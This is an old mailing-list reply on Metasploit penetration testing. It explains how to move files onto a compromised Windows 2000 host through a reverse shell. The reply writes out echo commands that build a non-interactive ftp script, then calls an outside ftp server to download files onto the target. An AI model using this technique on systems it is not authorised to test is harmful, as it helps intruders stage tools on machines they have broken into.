Metasploit pen testing questions

[sgorton at skaion.com (Sam Gorton)]

On Wed, Nov 10, 2004 at 10:38:46PM +0000, Regence 21 wrote:
> On Win2k I can get a reverse shell easily and execute commands, but if I 
> try and start the Windows command line ftp client won't work (the command 
> line just sits there after I enter ftp). Am I missing something? Without 
> ftp, what is the easiest way to upload a file to a Win2k target host?

ftp is trying to interact with you, but it can't.  What you can do is
to create a file on the target host that contains the username,
password, and all your FTP commands. You can load that file with ftp
-s:<filename>

Something like this:

cd \temp
echo ftp> ftp.txt
echo user at host>> ftp.txt
echo cd pub/...>> ftp.txt
echo prompt>> ftp.txt
echo hash>> ftp.txt
echo mget *>> ftp.txt
echo bye>> ftp.txt

ftp -s:ftp.txt <ftp_server>

Note that this creates the output file (in a directory we can write 
to), then appends to it.  Don't leave a space before the redirect, it 
ends up in your ftp commands.  Make sure you eliminate any 
interaction.

(There may be an actual tutorial somewhere in how to do this, but I
learned this trick from someone else.) I've had good luck automating
this by wrapping metasploit with Perl's Expect.pm, but that's me.

--
Sam Gorton                |   Skaion Corporation
sgorton at skaion.com        |   (781) 396-1095